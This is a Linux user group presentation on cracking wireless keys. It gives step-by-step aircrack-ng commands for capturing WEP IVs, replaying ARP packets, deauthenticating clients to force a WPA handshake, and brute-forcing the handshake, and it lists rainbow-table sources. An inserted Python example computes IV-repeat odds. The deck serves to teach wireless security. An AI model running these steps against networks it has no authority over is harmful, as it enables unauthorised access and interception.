How to Crack WPA


    8/12/2019 How to Crack WPA


    Ryan Curtin Cracking Wireless - p. 1

    Cracking Wireless

    Ryan Curtin

    LUG@GT

    http://www.igglybob.com/

    Goals

    Setting Up

    Checking Injection

    WEP

    WPA

    Questions and Comments?


    Goals

    By the end of this presentation (if you stay awake), you will:

    Understand the different types of wireless keys as well as their advantages and disadvantages

    Understand the legal ramifications of cracking wireless keys

    Have a basic idea of the theory behind the cracking of each key type

    Know how to use software to crack wireless keys


    Setting Up

    Most of the work can be done with the aircrack-ng package.

    None of these attacks can be performed if you are using ndiswrapper for your network drivers, or other drivers that do not support promiscuous (or monitor) mode.

    Starting / stopping promiscuous mode:

    airmon-ng stop wlan0

    airmon-ng check wlan0

    airmon-ng start wlan0


    Checking Injection

    Before starting, make sure your card can inject packets into an AP!

    aireplay-ng -9 -e -a wlan0

    Make sure the percentage of ping replies is not incredibly small, otherwise it may be difficult to collect data.


    WEP Encryption

    The slide title is not redundant! WEP stands for wired equivalent privacy, not wireless encryption protocol.

    64-bit or 128-bit keys

    Uses RC4 stream cipher with CRC-32 checksum

    Keys have 24-bit IV (initialization vector)

    2^24 (16 million) possible IVs

    50% probability of repeated IV after only 5000 packets


    Cracking WEP

    Different methods have been developed:

    2001: Fluhrer, Mantin, and Shamir publish WEP flaws and a passive attack

    2005: FBI demonstrates WEP cracking in three minutes

    2006: Bittau, Handley, and Lackey show that active attacks are possible

    2007: Pyshkin, Tews, and Weinmann optimize the active attack (PTW attack)


    Using aircrack-ng

    1. Gather important data: access point MAC, ESSID, channel

    airodump-ng wlan0

    2. Start capture of IVs

    airodump-ng -c --bssid -w wlan0

    Leave this running! You want to capture around 50k IVs to ensure success (maybe more)

    3. Fake authentication with AP

    aireplay-ng -1 0 -e -a wlan0


    Using aircrack-ng (2)

    4. Reinject ARP packets to get more IVs

    aireplay-ng -3 -b wlan0

    Run until you have a substantial number of IVs (in your airodump-ng process)

    5. Crack the key!

    FMS attacks (slow): aircrack-ng -f 1 -F .cap

    PTW attacks (fast!): aircrack-ng -P 2 .cap


    WPA Encryption

    WPA with TKIP appeared as an interim solution to the WEP problem while 802.11i was prepared; 802.11i is WPA2.

    WPA: Wi-Fi Protected Access

    TKIP: Temporal Key Integrity Protocol

    TKIP also uses RC4 cipher (for legacy WEP hardware)

    Use AES instead if possible!

    IV length increased to 48 bits

    WPA-PSK (pre-shared key): common consumer environment setup
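    The two IV-space figures in this deck (the WEP Encryption slide's 50% chance of a repeated 24-bit IV after about 5000 packets, and TKIP's move to a 48-bit IV) both follow from the birthday bound. The Python below is an added example, not part of the original slides; the 500 frames/s traffic rate it uses is a constructed figure. It computes the exact IV-repeat probability for a given frame count and the frame count at which a repeat becomes more likely than not, so the defensive value of the longer IV can be read off directly.

```python
import math

WEP_IV_BITS = 24    # WEP: 24-bit IV, as on the WEP Encryption slide
TKIP_IV_BITS = 48   # TKIP: IV length increased to 48 bits


def iv_repeat_probability(frames: int, iv_bits: int = WEP_IV_BITS) -> float:
    """Exact probability that at least one IV value is reused among `frames`
    frames, assuming each frame draws its IV uniformly at random (the
    classic birthday problem). Summing log1p terms keeps the long product
    accurate instead of underflowing."""
    space = 1 << iv_bits
    if frames > space:
        return 1.0  # pigeonhole: more frames than distinct IV values
    log_no_repeat = 0.0
    for i in range(frames):
        log_no_repeat += math.log1p(-i / space)
    return 1.0 - math.exp(log_no_repeat)


def frames_for_half_chance(iv_bits: int) -> int:
    """Smallest frame count at which an IV repeat is more likely than not,
    via the standard birthday approximation n ~ sqrt(2 * N * ln 2).
    (Exact enumeration is impractical for the 48-bit space.)"""
    space = 1 << iv_bits
    return math.ceil(math.sqrt(2 * space * math.log(2)))


def seconds_for_half_chance(iv_bits: int, frames_per_second: float) -> float:
    """Wall-clock time to reach the 50% repeat point at a given traffic rate."""
    return frames_for_half_chance(iv_bits) / frames_per_second


if __name__ == "__main__":
    # Reproduces the slide's claim: ~52% chance of a repeated WEP IV at 5000 frames.
    print(f"WEP, 5000 frames: P(repeat) = {iv_repeat_probability(5000):.3f}")
    for bits in (WEP_IV_BITS, TKIP_IV_BITS):
        n = frames_for_half_chance(bits)
        # constructed rate: a busy AP pushing ~500 frames/s
        print(f"{bits}-bit IV: 50% repeat after {n:,} frames "
              f"(~{seconds_for_half_chance(bits, 500):,.0f} s at 500 frames/s)")
```

    The 24-bit space hits the 50% point in under 5000 frames (seconds of traffic), while the 48-bit space needs roughly 20 million frames; the same math is why 802.11i replaced per-packet RC4 keying rather than merely widening the IV again.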


    Cracking WPA-PSK

    The WPA-PSK initialization process is deterministic, and therefore reproducible!

    Therefore, we must capture a WPA handshake and then try to replicate it.


    Using aircrack-ng

    1. Gather important data: access point MAC, ESSID, channel; optional: ESSID of connected client

    airodump-ng wlan0

    2. Start capture of handshakes

    airodump-ng -c --bssid -w wlan0

    Leave this running! Watch for "WPA handshake: xx:xx:xx:xx:xx:xx"

    3. (Optional) Fake deauthentication of client to trigger handshake

    aireplay-ng -0 1 -a -c wlan0

    Watch for successful ACK in program output

    4. Brute-force attack on the saved handshake

    aircrack-ng -w -b


    Rainbow Tables

    Rainbow Tables: a giant collection of potential common passphrases

    Available from:

    Church of Wifi Rainbow Tables: http://www.renderlab.net/projects/WPA-tables/

    The Shmoo Group: http://rainbowtables.shmoo.com/

    Google Search: http://www.google.com/#q=wpa+rainbow+tables


    Questions and Comments?
